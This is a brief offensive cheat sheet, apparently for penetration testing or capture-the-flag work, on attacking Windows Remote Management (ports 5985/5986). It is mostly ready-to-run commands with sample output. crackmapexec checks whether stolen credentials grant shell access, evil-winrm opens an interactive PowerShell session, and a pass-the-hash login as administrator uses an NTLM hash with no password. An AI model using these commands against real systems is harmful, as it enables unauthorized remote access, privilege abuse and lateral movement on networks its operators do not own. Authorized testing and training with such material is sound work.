WinRM (5985/5986)
Check access with found creds
Pwn3d! in the output means the credentials give remote management (shell) access
crackmapexec winrm $IP -u <user> -p <pass>
Example Output
crackmapexec winrm 10.10.10.5 -u john -p Password123
WINRM 10.10.10.5 5985 DC01 [+] corp.local\john:Password123 (Pwn3d!)
(Pwn3d! = you can get a shell)
Get shell
Interactive PowerShell — Full shell access
evil-winrm -i $IP -u <user> -p <pass>
Example Output
evil-winrm -i 10.10.10.5 -u john -p Password123
*Evil-WinRM* PS C:\Users\john\Documents> whoami
corp\john
(Interactive PowerShell session)
Pass the hash
Authenticate with the account's NTLM hash instead of a password
evil-winrm -i $IP -u <user> -H <ntlm_hash>
Example Output
evil-winrm -i 10.10.10.5 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
*Evil-WinRM* PS C:\Users\Administrator>
(evil-winrm supports pass-the-hash natively via the -H flag)
(No password needed, only the NT hash)